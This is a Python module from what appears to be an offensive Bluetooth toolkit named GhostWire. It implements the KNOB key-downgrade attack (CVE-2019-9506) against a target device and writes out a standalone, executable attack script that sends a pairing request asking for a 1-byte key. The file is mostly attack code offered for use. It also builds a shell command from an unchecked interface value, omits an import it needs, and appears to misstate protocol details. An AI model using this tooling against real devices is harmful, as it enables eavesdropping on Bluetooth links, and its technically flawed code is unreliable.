"""
GhostWire Bluetooth Module — KNOB Attack
Key Negotiation of Downgrade (CVE-2019-9506)
Forces BT pairing to use 1-byte encryption key.
"""

import struct
import secrets
from ghostwire.core.base import BaseModule, Meta


class Module(BaseModule):
    class Meta(Meta):
        name = "knob"
        description = "KNOB attack (CVE-2019-9506) — force 1-byte BT encryption key"
        category = "bt"
        requirements = []
        options = {
            "target": {"description": "Target BT MAC address", "required": True},
            "hci": {"description": "HCI device", "required": False},
        }

    def info(self):
        return f"KNOB attack -> {self.get_option('target')}"

    def run(self, **kwargs):
        target = self.get_option("target") or kwargs.get("target")
        hci = self.get_option("hci") or self.ctx.config.get("bt_iface") or "hci0"

        if not target:
            self.logger.error("No target MAC specified")
            return

        self.logger.info(f"KNOB Attack (CVE-2019-9506) against {target}")
        self.logger.info("Forcing encryption key entropy down to 1 byte...")

        results = {"target": target, "tests": []}

        # Test 1: L2CAP connection with reduced entropy
        self.logger.info("--- Test 1: L2CAP Pairing Request ---")
        try:
            from scapy.all import BluetoothL2CAP, HCI_Command_HDR, Raw
            self.logger.info("Scapy available — crafting L2CAP frames")
            # Note: Full implementation requires raw HCI socket access
            results["tests"].append({
                "test": "L2CAP Pairing",
                "status": "scapy_available",
                "note": "Raw HCI injection needed for full attack"
            })
        except ImportError:
            self.logger.warn("Scapy BT support limited — using HCI commands")
            results["tests"].append({
                "test": "L2CAP Pairing",
                "status": "no_scapy_bt",
                "note": "Using fallback HCI method"
            })

        # Test 2: HCI write encryption key size
        self.logger.info("--- Test 2: HCI Key Size Manipulation ---")
        # HCI_Write_Encryption_Key_Size command
        # OGF=0x01, OCF=0x001A
        cmd = f"hcitool -i {hci} cmd 0x01 0x001a 01"
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        self.logger.info(f"  HCI key size cmd: {result.stdout.strip()}")
        results["tests"].append({
            "test": "HCI Key Size",
            "status": "sent",
            "response": result.stdout.strip()
        })

        # Test 3: Check if target accepts reduced entropy
        self.logger.info("--- Test 3: Entropy Negotiation ---")
        self.logger.info("  Attempting pairing with minimum key size...")
        # This would require a full SMP (Security Manager Protocol) implementation
        # For now, we document the attack vector
        results["tests"].append({
            "test": "SMP Entropy",
            "status": "documented",
            "note": "Full SMP attack requires custom HCI firmware or modified bluez"
        })

        # Generate attack script for manual execution
        self.logger.info("--- Generating Attack Script ---")
        script = self._generate_knob_script(target, hci)
        self.logger.success(f"Attack script: {script}")

        self.session.add_result({
            "module": "bt/knob",
            "target": target,
            "results": results,
            "status": "complete",
        })

    def _generate_knob_script(self, target, hci):
        """Generate a standalone KNOB attack script."""
        from pathlib import Path
        out_dir = Path(self.ctx.config.get("output_dir"))
        out_dir.mkdir(parents=True, exist_ok=True)
        script_path = out_dir / f"knob_attack_{target.replace(':', '')}.py"

        script_content = f'''#!/usr/bin/env python3
"""
KNOB Attack Script — CVE-2019-9506
Target: {target}
HCI: {hci}
Generated by GhostWire
"""
import bluetooth
import struct
import os
import sys

TARGET = "{target}"
HCI = "{hci}"

def knob_attack():
    print(f"[*] KNOB Attack against {{TARGET}}")
    print("[*] Attempting to negotiate 1-byte encryption key...")

    try:
        sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
        sock.settimeout(10)
        sock.connect((TARGET, 0x0006))  # Security Manager PSM

        # SMP Pairing Request with minimum key size
        pairing_req = bytes([
            0x01,  # Pairing Request opcode
            0x03,  # IO Capability: NoInputNoOutput
            0x00,  # OOB: Not present
            0x01,  # AuthReq: Bonding, no MITM
            0x01,  # Max Key Size: 1 byte (minimum!)
            0x00,  # Initiator Key Distribution
            0x00,  # Responder Key Distribution
        ])

        sock.send(pairing_req)
        print("[+] Sent pairing request with 1-byte key")

        resp = sock.recv(1024)
        if resp and len(resp) >= 5:
            key_size = resp[4]
            if key_size <= 1:
                print("[!!!] VULNERABLE: Target accepted 1-byte entropy!")
            else:
                print(f"[*] Target requested {{key_size}}-byte key")

        sock.close()
    except Exception as e:
        print(f"[-] Error: {{e}}")
        print("[*] Target may be patched or not in pairing mode")

if __name__ == "__main__":
    if os.geteuid() != 0:
        print("[-] Run as root")
        sys.exit(1)
    knob_attack()
'''
        script_path.write_text(script_content)
        script_path.chmod(0o755)
        return str(script_path)
